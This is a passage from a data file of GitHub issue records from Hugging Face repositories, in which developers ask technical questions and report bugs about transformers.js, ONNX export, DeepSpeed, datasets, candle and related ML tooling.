output_hidden_states: true,\r\n output_cross_attentions: true,\r\n output_attentions: true\r\n }\r\n })\r\n const translated = await model.generate(tokens)\r\n const result = tokenizer.decode(translated[0], { skip_special_tokens: true })\r\n console.log((await model.getAttentions(translated)))\r\n\r\n```\r\n\r\nI'm then getting the following error when I run the code:\r\n\r\n`\r\nError: `output_attentions` is true, but the model did not produce cross-attentions. This is most likely because the model was not exported with `output_attentions=True`.\r\n`\r\n\r\nI've looked around but haven't been able to find out what is meant by the reference to exporting the model. 
How would I go about fixing this?", "url": "https://github.com/huggingface/transformers.js/issues/516", "state": "open", "labels": [ "question" ], "created_at": "2024-01-11T20:16:42Z", "updated_at": "2024-01-15T08:21:17Z", "user": "DaveTJones" }, { "repo": "huggingface/text-generation-inference", "number": 1437, "title": "How to run text-generation-benchmark without the graph and get the output data into a csv file or a json file?", "body": "### Feature request\n\ntext-generation-benchmark has been an amazing tool for understanding the model deployments better. Is there a way we can run this without generating the graph and get the results in a CSV format?\n\n### Motivation\n\nThe motivation is that we want to use this tool with another program which gets the results from the binary. \n\n### Your contribution\n\nI'm not sure. It looks like an addition to the TGI-benchmark parameters, and it can be a potential PR", "url": "https://github.com/huggingface/text-generation-inference/issues/1437", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-01-11T15:33:37Z", "updated_at": "2024-02-17T01:44:18Z", "user": "pranavthombare" }, { "repo": "huggingface/transformers.js", "number": 515, "title": "ONNX optimisations for edge deployment", "body": "### Question\r\n\r\nHello, I'm exploring whether I can extract any more performance from my deployment of transformers.js. I appreciate the answer to this is nuanced and best answered by profiling, but I would value the opinions of experts who have walked this path before using this lib.\r\n\r\nIn my specific use case I know that I will always be deploying to the latest Chrome running on Windows systems that exist in a VM and do not have a dedicated GPU (i.e. a vanilla corporate desktop).\r\n\r\nIn the current util, during the export no optimization flag is passed, so by default the models aren't optimized. https://github.com/xenova/transformers.js/blob/main/scripts/convert.py#L426 \r\n\r\nThe main export takes an AutoOptimization level as a string, and given no GPUs I would be restricted to O3.\r\nhttps://github.com/huggingface/optimum/blob/main/optimum/exporters/onnx/__main__.py#L567\r\n\r\n## Questions:\r\n\r\n1. Are there any reasons I wouldn't want to optimize a model using transformers.js?\r\n2. Auto optimize seems to detect BERT automatically.\r\nhttps://github.com/microsoft/onnxruntime/blob/main/onnxruntime/python/tools/transformers/fusion_options.py#L56 \r\nIs there any reason that I should modify transformers.js convert.py to manually call ORTOptimizer with an OptimizationConfig in between steps 1&2 instead of passing a level string in step 1?\r\nhttps://github.com/xenova/transformers.js/blob/main/scripts/convert.py#L429\r\n", "url": "https://github.com/huggingface/transformers.js/issues/515", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-11T13:49:59Z", "updated_at": "2025-10-13T04:59:32Z", "user": "georgedavies019" }, { "repo": "huggingface/alignment-handbook", "number": 98, "title": "Is QLoRA better than finetuning?", "body": "The results reported in https://github.com/huggingface/alignment-handbook/pull/88 suggest that QLoRA is better for both SFT and DPO. 
Is this accurate, and have people seen this happen in any other settings?", "url": "https://github.com/huggingface/alignment-handbook/issues/98", "state": "open", "labels": [], "created_at": "2024-01-10T21:04:11Z", "updated_at": "2024-01-10T21:04:11Z", "comments": 0, "user": "normster" }, { "repo": "huggingface/transformers.js", "number": 514, "title": "Is it possible to use adapters from the hub?", "body": "### Question\n\nHi, would it be possible to use adapters on top of a model using the js library?", "url": "https://github.com/huggingface/transformers.js/issues/514", "state": "open", "labels": [ "question" ], "created_at": "2024-01-10T20:57:03Z", "updated_at": "2024-01-11T16:01:11Z", "user": "vabatta" }, { "repo": "huggingface/setfit", "number": 468, "title": "How effective is to use your own pre-trained ST model based on NLI dataset ?", "body": "Hi !\r\n\r\nI'm interested in using SetFit to classify text extracted from hotel reviews (booking, tripadvisor, etc), but I would like to add domain knowledge to my Sentence Transformers body.\r\n\r\nFor example, this [paper](https://arxiv.org/abs/2202.01924) uses a Sentence Transformers model trained on a custom NLI dataset (RNLI, for Review Natural Language Inference) to extract product features without training on labeled data. The results show that training on a domain-based NLI dataset is better than MNLI for zero-shot aspect extraction.\r\n\r\nSo, is it a good approach to train my own Sentence Transformers model (or fine-tune a pre-trained one) on a domain-based NLI dataset to improve the performance of SetFit?\r\n\r\nThank you in advance ", "url": "https://github.com/huggingface/setfit/issues/468", "state": "closed", "labels": [], "created_at": "2024-01-10T19:25:09Z", "updated_at": "2024-02-09T14:55:46Z", "user": "azaismarc" }, { "repo": "huggingface/transformers.js", "number": 512, "title": "What do you all think about having a \"Transformers.js Community\" in Hugging Face?", "body": "### Question\n\nAfter checking how the [MLX Community on Hugging Face](https://huggingface.co/mlx-community) is working, I thought it could be a good idea to have one for Transformers.js.\r\n\r\nOne of the key benefits of a community is \"multiple curators\": anyone in the community would have the ability to edit the repositories, which makes it easier to maintain the converted models and ensure that they have more detailed Readmes.\r\n\r\nAlso, having multiple curators allows for quicker resolution of issues with the model configuration. 
Members of the community won't need to create a pull request to request changes or wait for someone to approve the PR, which is especially important for urgent fixes.\r\n\r\nAnother good move the MLX community made was releasing a script that automatically uploads models to the organization in Hugging Face, which makes it easy for anyone to convert and share their favorite models.\r\n\r\nI would love to hear the opinions of others.", "url": "https://github.com/huggingface/transformers.js/issues/512", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-10T16:03:51Z", "updated_at": "2025-05-10T21:06:54Z", "user": "felladrin" }, { "repo": "huggingface/candle", "number": 1552, "title": "How to pass the attention_mask to Bert model in examples?", "body": "I am trying to run `shibing624/text2vec-base-chinese` with candle, and the encoder returns `input_ids`, `attention_mask`, `token_id_types`, but there are only two params of BertModel in candle.\r\n\r\nhttps://github.com/huggingface/candle/blob/main/candle-examples/examples/bert/main.rs#L170\r\n\r\n```python\r\nfrom transformers import BertTokenizer, BertModel\r\nimport torch\r\n\r\n# Mean Pooling - Take attention mask into account for correct averaging\r\ndef mean_pooling(model_output, attention_mask):\r\n token_embeddings = model_output[0] # First element of model_output contains all token embeddings\r\n input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()\r\n return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)\r\n\r\n# Load model from HuggingFace Hub\r\ntokenizer = BertTokenizer.from_pretrained('shibing624/text2vec-base-chinese')\r\nmodel = BertModel.from_pretrained('shibing624/text2vec-base-chinese')\r\nsentences = ['\u5982\u4f55\u66f4\u6362\u82b1\u5457\u7ed1\u5b9a\u94f6\u884c\u5361', '\u82b1\u5457\u66f4\u6539\u7ed1\u5b9a\u94f6\u884c\u5361']\r\n# Tokenize sentences\r\nencoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')\r\n\r\n# Compute token embeddings\r\nwith torch.no_grad():\r\n model_output = model(**encoded_input)\r\n# Perform pooling. In this case, mean pooling.\r\nsentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])\r\nprint(\"Sentence embeddings:\")\r\nprint(sentence_embeddings)\r\n```", "url": "https://github.com/huggingface/candle/issues/1552", "state": "closed", "labels": [], "created_at": "2024-01-10T11:57:55Z", "updated_at": "2024-01-10T12:38:54Z", "user": "lz1998" }, { "repo": "huggingface/sentence-transformers", "number": 2400, "title": "New release of library?", "body": "I was wondering when you will be releasing a new version of the library that includes the latest changes in the main branch? 
We are eagerly awaiting one in order to consume the fix for this issue https://github.com/UKPLab/sentence-transformers/issues/1800", "url": "https://github.com/huggingface/sentence-transformers/issues/2400", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-09T20:42:53Z", "updated_at": "2024-01-29T10:00:33Z", "user": "vineetsajuTR" }, { "repo": "huggingface/peft", "number": 1334, "title": "when we use inject_adapter_in_model method to inject the adapters directly into a PyTorch model, how to merge the Lora weight with the base model in the inference stage?", "body": "", "url": "https://github.com/huggingface/peft/issues/1334", "state": "closed", "labels": [], "created_at": "2024-01-09T12:30:52Z", "updated_at": "2024-02-17T15:03:59Z", "user": "mikiyukio" }, { "repo": "huggingface/datasets", "number": 6570, "title": "No online docs for 2.16 release", "body": "We do not have the online docs for the latest minor release 2.16 (neither 2.16.0 nor 2.16.1).\r\n\r\nIn the online docs, the latest version appearing is 2.15.0: https://huggingface.co/docs/datasets/index\r\n\r\n![Screenshot from 2024-01-09 08-43-08](https://github.com/huggingface/datasets/assets/8515462/83613222-867f-41f4-8833-7a4a76582f44)\r\n", "url": "https://github.com/huggingface/datasets/issues/6570", "state": "closed", "labels": [ "bug", "documentation" ], "created_at": "2024-01-09T07:43:30Z", "updated_at": "2024-01-09T16:45:50Z", "comments": 7, "user": "albertvillanova" }, { "repo": "huggingface/text-generation-inference", "number": 1415, "title": "How to use local Medusa head?", "body": "It is said that Medusa can significantly accelerate inference speed. During my attempts to utilize it, I have observed that it does not support the use of a local Medusa config and head. The code fragment I discovered that pertains to this functionality is as follows, which I have modified. However, I do not comprehend the meaning of 'medusa_sf'. The training process of Medusa does not generate new safetensors. What is this? \r\n```python\r\nmedusa_config = f\"{model_id}/config_medusa.json\"\r\n# medusa_config = hf_hub_download(\r\n# use_medusa, revision=revision, filename=\"config.json\"\r\n# )\r\nwith open(medusa_config, \"r\") as f:\r\n config = json.load(f)\r\nmedusa_head = f\"{model_id}/medusa_lm_head.pt\"\r\n# medusa_head = hf_hub_download(\r\n# use_medusa, revision=revision, filename=\"medusa_lm_head.pt\"\r\n# )\r\nmedusa_sf = medusa_head[: -len(\".pt\")] + \".safetensors\"\r\nweights = Weights(\r\n [medusa_sf], device, dtype, process_group=self.process_group\r\n)\r\nlm_head = model.lm_head\r\nmodel.lm_head = MedusaModel(config, weights, lm_head)\r\n```\r\n\r\nHow should I employ TGI to access the local Medusa? A huge thanks for your work!", "url": "https://github.com/huggingface/text-generation-inference/issues/1415", "state": "closed", "labels": [], "created_at": "2024-01-09T03:22:47Z", "updated_at": "2024-01-10T17:36:23Z", "user": "eurus-ch" }, { "repo": "huggingface/transformers", "number": 28388, "title": "How to use an efficient encoder as shared EncoderDecoderModel?", "body": "### Feature request\n\nEfficient encoders like DistilBERT, ALBERT or ELECTRA aren't supported as the decoder of the EncoderDecoderModel, and so they can't be shared as encoder and decoder.\n\n### Motivation\n\nWarm-starting shared models is a powerful way to build transformer models. Yet the efficient models can't be used.\n\n### Your contribution\n\nWe could implement support for DistilBERT, ALBERT or ELECTRA. 
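For contrast, a minimal sketch of the shared warm-start pattern that already works with BERT-style checkpoints (standard `transformers` usage, shown only to illustrate what this request would extend to the efficient encoders):

```python
from transformers import EncoderDecoderModel

# Warm-start encoder and decoder from the same BERT checkpoint and tie their
# weights, so the two towers share parameters.
model = EncoderDecoderModel.from_encoder_decoder_pretrained(
    "bert-base-uncased", "bert-base-uncased", tie_encoder_decoder=True
)

# Swapping in e.g. "distilbert-base-uncased" is what currently fails: DistilBERT
# has no decoder/cross-attention implementation to serve as the decoder half.
```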
They shouldn't be that different from other encoders.", "url": "https://github.com/huggingface/transformers/issues/28388", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-01-08T11:43:05Z", "updated_at": "2024-01-08T12:35:24Z", "user": "Bachstelze" }, { "repo": "huggingface/alignment-handbook", "number": 92, "title": "Is there anyway that I can use learning rate warm-up during the training ? ", "body": "I am using this repo to:\r\n1. Continual Pre-training \r\n2. SFT\r\n3. DPR\r\n\r\nFor stage 1, I want to use a learning rate warm-up. ", "url": "https://github.com/huggingface/alignment-handbook/issues/92", "state": "closed", "labels": [], "created_at": "2024-01-07T21:07:25Z", "updated_at": "2024-01-10T06:48:52Z", "comments": 1, "user": "shamanez" }, { "repo": "huggingface/alignment-handbook", "number": 91, "title": "how to use dpo without flash-attention", "body": "Is there any flash-attention free version?", "url": "https://github.com/huggingface/alignment-handbook/issues/91", "state": "open", "labels": [], "created_at": "2024-01-07T16:27:08Z", "updated_at": "2024-02-06T19:51:38Z", "user": "Fu-Dayuan" }, { "repo": "huggingface/accelerate", "number": 2312, "title": "Seeking for Help: how to work deepspeed zero stage 3 with quantized model? ", "body": "Hi, I would like to conduct dpo training on my 2 a6000 (48GB) gpus based on this project (https://github.com/allenai/open-instruct). Specifically, the model was based on qlora and reference model was based on quantized one. I would like to utilize the deepspeed zero stage 3 to accelerate training time. \r\n\r\nDuring the training process, I encountered errors related to the model and reference model integration with Deepspeed. Below is the relevant code snippet and the encountered error:\r\n\r\n\r\nThe model and reference model both were loaded with \r\n\r\n```python\r\nbnb_config = BitsAndBytesConfig(\r\n load_in_8bit=True,\r\n )\r\ndevice_index = accelerator.local_process_index\r\ndevice_map = {\"\": device_index} # force data-parallel training.\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_name_or_path,\r\n from_tf=bool(\".ckpt\" in model_name_or_path),\r\n config=config,\r\n load_in_8bit=True,\r\n quantization_config=bnb_config,\r\n torch_dtype=torch.bfloat16,\r\n use_flash_attention_2=True if args.use_flash_attn else False,\r\n)\r\nreference_model = model\r\n\r\n# some codes about coverting model to lora model...\r\n\r\ndef prepare_deepspeed(accelerator, model):\r\n deepspeed_plugin = accelerator.state.deepspeed_plugin\r\n config_kwargs = deepcopy(deepspeed_plugin.deepspeed_config)\r\n\r\n if model is not None:\r\n if hasattr(model, \"config\"):\r\n hidden_size = (\r\n max(model.config.hidden_sizes)\r\n if getattr(model.config, \"hidden_sizes\", None)\r\n else getattr(model.config, \"hidden_size\", None)\r\n )\r\n if hidden_size is not None and config_kwargs[\"zero_optimization\"][\"stage\"] == 3:\r\n # Note that `stage3_prefetch_bucket_size` can produce DeepSpeed messages like: `Invalidate trace cache @ step 0: expected module 1, but got module 0`\r\n # This is expected and is not an error, see: https://github.com/microsoft/DeepSpeed/discussions/4081\r\n config_kwargs.update(\r\n {\r\n \"zero_optimization.reduce_bucket_size\": hidden_size * hidden_size,\r\n \"zero_optimization.stage3_param_persistence_threshold\": 10 * hidden_size,\r\n \"zero_optimization.stage3_prefetch_bucket_size\": 0.9 * hidden_size * hidden_size,\r\n }\r\n )\r\n\r\n # If ZeRO-3 is used, we shard both the active and reference 
model.\r\n # Otherwise, we assume the reference model fits in memory and is initialized on each device with ZeRO disabled (stage 0)\r\n if config_kwargs[\"zero_optimization\"][\"stage\"] != 3:\r\n config_kwargs[\"zero_optimization\"][\"stage\"] = 0\r\n model, *_ = deepspeed.initialize(model=model, config=config_kwargs)\r\n model.eval()\r\n return model\r\n\r\nreference_model = prepare_deepspeed(accelerator, reference_model)\r\n```\r\n\r\n\r\n\r\n```\r\nFile \"/root/data1/tulu2/open-instruct/open-instruct-main/open_instruct/dpo_tune.py\", line 692, in main \r\n reference_model = prepare_deepspeed(accelerator, reference_model) \r\n File \"/root/data1/tulu2/open-instruct/open-instruct-main/open_instruct/dpo_tune.py\", line 396, in prepare_deepspeed \r\n model, *_ = deepspeed.initialize(model=model, config=config_kwargs) \r\n File \"/conda/envs/tulu_dpo_env/lib/python3.10/site-packages/deepspeed/__init__.py\", line 171, in initialize \r\n engine = DeepSpeedEngine(args=args, \r\n File \"/conda/envs/tulu_dpo_env/lib/python3.10/site-packages/deepspeed/runtime/engine.py\", line 259, in __init__ \r\n self._configure_distributed_model(model) \r\n File \"/conda/envs/tulu_dpo_env/lib/python3.10/site-", "url": "https://github.com/huggingface/accelerate/issues/2312", "state": "closed", "labels": [], "created_at": "2024-01-07T09:44:28Z", "updated_at": "2024-01-11T11:01:31Z", "user": "grayground" }, { "repo": "huggingface/datasets", "number": 6565, "title": " `drop_last_batch=True` for IterableDataset map function is ignored with multiprocessing DataLoader ", "body": "### Describe the bug\r\n\r\nScenario:\r\n- Interleaving two iterable datasets of unequal lengths (`all_exhausted`), followed by a batch mapping with batch size 2 to effectively merge the two datasets and get a sample from each dataset in a single batch, with `drop_last_batch=True` to skip the last batch in case it doesn't have two samples.\r\n\r\nWhat works:\r\n- Using DataLoader with `num_workers=0`\r\n\r\nWhat does not work:\r\n- Using DataLoader with `num_workers=1`, errors in the last batch.\r\n\r\nBasically, `drop_last_batch=True` is ignored when using multiple dataloading workers.\r\n\r\nPlease take a look at the minimal repro script below.\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nfrom datasets import Dataset, interleave_datasets\r\nfrom torch.utils.data import DataLoader\r\n\r\n\r\ndef merge_samples(batch):\r\n assert len(batch['a']) == 2, \"Batch size must be 2\"\r\n batch['c'] = [batch['a'][0]]\r\n batch['d'] = [batch['a'][1]]\r\n return batch\r\n\r\n\r\ndef gen1():\r\n for ii in range(1, 8385):\r\n yield {\"a\": ii}\r\n\r\n\r\ndef gen2():\r\n for ii in range(1, 5302):\r\n yield {\"a\": ii}\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n dataset1 = Dataset.from_generator(gen1).to_iterable_dataset(num_shards=1024)\r\n dataset2 = Dataset.from_generator(gen2).to_iterable_dataset(num_shards=1024)\r\n\r\n interleaved = interleave_datasets([dataset1, dataset2], stopping_strategy=\"all_exhausted\")\r\n mapped = interleaved.map(merge_samples, batched=True, batch_size=2, remove_columns=interleaved.column_names,\r\n drop_last_batch=True)\r\n\r\n # Works\r\n loader = DataLoader(mapped, batch_size=32, num_workers=0)\r\n i = 0\r\n for b in loader:\r\n print(i, b['c'].shape, b['d'].shape)\r\n i += 1\r\n\r\n print(\"DataLoader with num_workers=0 works\")\r\n\r\n # Doesn't work\r\n loader = DataLoader(mapped, batch_size=32, num_workers=1)\r\n i = 0\r\n for b in loader:\r\n print(i, b['c'].shape, b['d'].shape)\r\n i += 
1\r\n\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\n `drop_last_batch=True` should have the same behaviour for `num_workers=0` and `num_workers>=1`\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.16.1\r\n- Platform: macOS-10.16-x86_64-i386-64bit\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.20.2\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3\r\n- `fsspec` version: 2023.6.0\r\n\r\nI have also tested on Linux and got the same behavior.", "url": "https://github.com/huggingface/datasets/issues/6565", "state": "closed", "labels": [], "created_at": "2024-01-07T02:46:50Z", "updated_at": "2025-03-08T09:46:05Z", "comments": 2, "user": "naba89" }, { "repo": "huggingface/transformers.js", "number": 505, "title": "How do I use WebGL as executionProvider?", "body": "### Question\n\n```js\r\nexport const executionProviders = [\r\n // 'webgpu',\r\n 'wasm'\r\n];\r\n```\r\nI looked at src/backends/onnx.js and noticed that there was no webgl in the executionProviders.\r\nIs there a way to use WebGL as the executionProvider?", "url": "https://github.com/huggingface/transformers.js/issues/505", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-06T19:16:36Z", "updated_at": "2024-10-18T13:30:09Z", "user": "kwaroran" }, { "repo": "huggingface/diffusers", "number": 6474, "title": "how to use xformers", "body": "Maybe this is a relatively low-level question, but what always bothers me is: how does xFormers run when running SD? Or can it be accelerated by default after installing this library? Thank you all for answering my questions", "url": "https://github.com/huggingface/diffusers/issues/6474", "state": "closed", "labels": [], "created_at": "2024-01-06T03:34:16Z", "updated_at": "2024-01-11T03:38:19Z", "user": "babyta" }, { "repo": "huggingface/datasets", "number": 6561, "title": "Document YAML configuration with \"data_dir\"", "body": "See https://huggingface.co/datasets/uonlp/CulturaX/discussions/15#6597e83f185db94370d6bf50 for reference", "url": "https://github.com/huggingface/datasets/issues/6561", "state": "open", "labels": [ "documentation" ], "created_at": "2024-01-05T14:03:33Z", "updated_at": "2025-08-07T14:57:58Z", "comments": 6, "user": "severo" }, { "repo": "huggingface/sentence-transformers", "number": 2397, "title": "Does finetuning a cross-encoder yield prediction labels and not similarity scores?", "body": "Hi, \r\nThis is less of a coding issue and more of a conceptual question. I have binary labels for similarity and dissimilarity while training a cross-encoder, so it's a binary classification task. The pretrained cross-encoder has a float score, most of the time around .5. After finetuning, the models only predict a decimal really close to 0 or 1, which makes sense since the model is being trained for a binary classification task. But is it supposed to be a label prediction or a similarity score? Or is it limited to the type of data you have for training? 
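One way to read this, sketched under the assumption that the model follows sentence-transformers' defaults (a single output logit and no activation override in the model config): `CrossEncoder.predict` applies a sigmoid when `num_labels == 1`, so the outputs are probabilities of the positive class, i.e. label confidences, not calibrated similarity scores.

```python
from sentence_transformers import CrossEncoder

# "path/to/finetuned-cross-encoder" is a placeholder for the binary model above.
model = CrossEncoder("path/to/finetuned-cross-encoder", num_labels=1)

# With num_labels == 1, predict() applies a sigmoid by default, so each score is
# P(label == 1) for the pair; threshold it to recover the hard label.
scores = model.predict([("first text", "second text")])
labels = scores > 0.5
```

Scores saturating near 0 or 1 after fine-tuning are then the expected behaviour of a confidently fit classifier, not a sign that training went wrong.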
", "url": "https://github.com/huggingface/sentence-transformers/issues/2397", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-04T21:01:44Z", "updated_at": "2024-01-09T17:53:17Z", "user": "FDSRashid" }, { "repo": "huggingface/text-generation-inference", "number": 1403, "title": "How to load llama-2 thru Client", "body": "### System Info\n\nHi there, text_generation.__version__ = 0.6.0\r\n\r\n\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI am trying to load llama-2 model thru Client\r\n\r\n```\r\nfrom text_generation import Client\r\nmodel_endpoint = \"https://api-inference.huggingface.co/models/meta-llama/Llama-2-7b-hf\"\r\n# model_endpoint = \"https://api-inference.huggingface.co/models/tiiuae/falcon-7b-instruct\"\r\n# model_endpoint = \"https://api-inference.huggingface.co/models/lmsys/vicuna-7b-v1.5\"\r\n\r\nclient = Client(model_endpoint, timeout=60, headers={\"Authorization\": f\"Bearer {token_auth}\"})\r\ngeneration: str = client.generate(\r\n prompt=\"What is the capital city of British Columbia, Canada\",\r\n temperature=1,\r\n top_p=0.9,\r\n max_new_tokens=384,\r\n stop_sequences=None,\r\n ).generated_text\r\n```\r\n\n\n### Expected behavior\n\nHowever, this is an error:\r\n\r\n> BadRequestError: Model requires a Pro subscription; check out hf.co/pricing to learn more. Make sure to include your HF token in your query.\r\n\r\nKindly ask any solutions ?\r\nthanks.", "url": "https://github.com/huggingface/text-generation-inference/issues/1403", "state": "closed", "labels": [], "created_at": "2024-01-04T17:25:59Z", "updated_at": "2024-01-05T16:01:56Z", "user": "yanan1116" }, { "repo": "huggingface/transformers", "number": 28343, "title": "How to log custom value?", "body": "I want to log some info to `{'loss': 2.5234, 'learning_rate': 1.0344827586206896e-06, 'epoch': 0.0}`\r\nhow can i do that?\r\nlike: {'loss': 2.5234, 'learning_rate': 1.0344827586206896e-06, 'epoch': 0.0, 'version': 'v1'} ", "url": "https://github.com/huggingface/transformers/issues/28343", "state": "closed", "labels": [], "created_at": "2024-01-04T12:28:43Z", "updated_at": "2024-01-07T13:07:22Z", "user": "xmy0916" }, { "repo": "huggingface/transformers.js", "number": 499, "title": "An error occurred during model execution: \"RangeError: offset is out of bounds\".", "body": "### Question\n\nHello - having an issue getting this code to run in the browser. 
Using `Xenova/TinyLlama-1.1B-Chat-v1.0` on `\"@xenova/transformers\": \"^2.13.2\"` \r\n\r\nIt runs perfectly in node.\r\n\r\n```ts\r\nimport { pipeline } from '@xenova/transformers';\r\n\r\nconsole.log('Loading model...');\r\nconst generator = await pipeline('text-generation', 'Xenova/TinyLlama-1.1B-Chat-v1.0');\r\nconsole.log('Model loaded!');\r\nconst messages = [\r\n { role: 'system', content: 'You are a friendly Assistant' },\r\n { role: 'user', content: 'Explain JavaScript Scopes in simple terms' },\r\n];\r\n\r\nconst prompt = generator.tokenizer.apply_chat_template(messages, {\r\n tokenize: false,\r\n add_generation_prompt: true,\r\n});\r\n\r\nconsole.log('Generating...');\r\nconst result = await generator(prompt, {\r\n max_new_tokens: 256,\r\n temperature: 0.5,\r\n do_sample: true,\r\n top_k: 50,\r\n});\r\n\r\nconsole.dir(result);\r\n```\r\n\r\nIn Node it runs: \r\n\r\n\"Screenshot \r\n\r\nBut in the browser I see this:\r\n\r\n\"Screenshot\r\n\r\nSame issue in Firefox.\r\n\r\nThis issue seems to say it's memory: https://github.com/xenova/transformers.js/issues/8\r\n\r\nIs this one too large to run in the browser?", "url": "https://github.com/huggingface/transformers.js/issues/499", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-03T19:55:45Z", "updated_at": "2024-10-18T13:30:09Z", "user": "wesbos" }, { "repo": "huggingface/transformers.js", "number": 497, "title": "Cross Encoder", "body": "### Question\n\nI'm trying to run this pre-trained Cross Encoder model ([MS Marco TinyBERT](https://huggingface.co/cross-encoder/ms-marco-TinyBERT-L-2-v2)) not available in Transformers.js.\r\n\r\nI've managed to convert it using the handy script, and I'm successfully running it with the \"feature-extraction\" task:\r\n```js\r\nconst pairs = [\r\n[\"How many people live in Berlin?\", \"Berlin had a population of 3,520,031 registered inhabitants in an area of 891.82 square kilometers.\"],\r\n[ \"How many people live in Berlin?\", \"Berlin is well known for its museums.\"]\r\n];\r\n\r\nconst model = await pipeline(\"feature-extraction\", modelName);\r\nconst out = await model(pairs[0]);\r\n\r\nconsole.log(Array.from(out.data)) // [-8.387903213500977, -9.811422348022461]\r\n```\r\n\r\nBut I'm trying to run it as a Cross Encoder model as it's intended to, like the Python [example code](https://www.sbert.net/docs/pretrained-models/ce-msmarco.html?highlight=cross%20encoder):\r\n```python\r\nfrom sentence_transformers import CrossEncoder\r\n\r\nmodel_name = 'cross-encoder/ms-marco-TinyBERT-L-2-v2'\r\nmodel = CrossEncoder(model_name, max_length=512)\r\n\r\nscores = model.predict([\r\n('How many people live in Berlin?', 'Berlin had a population of 3,520,031 registered inhabitants in an area of 891.82 square kilometers.'), \r\n('How many people live in Berlin?', 'Berlin is well known for its museums.')\r\n])\r\n\r\nprint(scores) // [ 7.1523685 -6.2870455]\r\n```\r\n\r\nHow can I infer a similarity score from two sentences?\r\n\r\nPS: if there are existing models/techniques for sentence similarity I'll take it!", "url": "https://github.com/huggingface/transformers.js/issues/497", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-03T16:24:37Z", "updated_at": "2024-03-01T00:11:31Z", "user": "achrafash" }, { "repo": "huggingface/autotrain-advanced", "number": 448, "title": "What is the difference between autotrain and kohya_ss?", "body": "What is the difference between autotrain and kohya_ss?\r\n\r\n ", "url": "https://github.com/huggingface/autotrain-advanced/issues/448", 
"state": "closed", "labels": [ "stale" ], "created_at": "2024-01-03T16:18:58Z", "updated_at": "2024-01-22T15:01:45Z", "user": "loboere" }, { "repo": "huggingface/optimum", "number": 1622, "title": "device set bug", "body": "### System Info\n\n```shell\noptimum 1.16.1\n```\n\n\n### Who can help?\n\n@philschmid\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, GPTQConfig\r\n\r\nmodel_id = \"facebook/opt-125m\"\r\ntokenizer = AutoTokenizer.from_pretrained(model_id)\r\nquantization_config = GPTQConfig(bits=4, dataset=[\"c4\", \"c4\", \"c4\"], tokenizer=tokenizer)\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(model_id, device_map=\"cuda:5\", quantization_config=quantization_config)\r\n\r\nprint()\n\n### Expected behavior\n\noptimum/gptq/quantizer.py line 429\r\ndata[k] = v.to(0)\r\n\r\nWhy is it fixed at 0? When setting device_map for the model, an error occurs that the input and model are not on the same device.\r\nIs this a bug?", "url": "https://github.com/huggingface/optimum/issues/1622", "state": "open", "labels": [ "bug" ], "created_at": "2024-01-03T09:01:16Z", "updated_at": "2024-01-09T10:17:45Z", "comments": 1, "user": "Yuang-Deng" }, { "repo": "huggingface/transformers.js", "number": 494, "title": "in-browser inference slower than node inference to be expected?", "body": "### Question\n\ni noticed that i get much higher performance when i run inference in node vs in the browser (latest chrome, m2 mac, ). is that generally to be expected? for context - i'm creating embeddings for chunks of text using the gte-small model. \r\nthank you!", "url": "https://github.com/huggingface/transformers.js/issues/494", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-03T04:26:47Z", "updated_at": "2024-08-27T23:53:36Z", "user": "carlojoerges" }, { "repo": "huggingface/optimum", "number": 1621, "title": "Cannot convert sentence transformer model properly", "body": "### System Info\r\n\r\n```shell\r\nOptimum Version = 1.16.1\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@michaelbenayoun \r\n@fxmarty\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [x] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [x] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nWhen running:\r\n`optimum-cli export onnx -m sentence-transformers/distiluse-base-multilingual-cased-v2 --task feature-extraction ./models/distiluse-base-multilingual-cased-v2`\r\n\r\nI get:\r\n```\r\n...\r\nThe ONNX export succeeded with the warning: The exported ONNX model does not have the exact same outputs as what is provided in SentenceTransformersTransformerOnnxConfig. Difference: onnx::Shape_530, onnx::Shape_233, onnx::Shape_332, onnx::Shape_431, onnx::Shape_629, 764.\r\n...\r\n```\r\n\r\nAnd afterwards when i try running the inference session with the generated .onnx model i get:\r\n```\r\nonnxruntime.capi.onnxruntime_pybind11_state.InvalidArgument: [ONNXRuntimeError] : 2 : INVALID_ARGUMENT : Non-zero status code returned while running Expand node. 
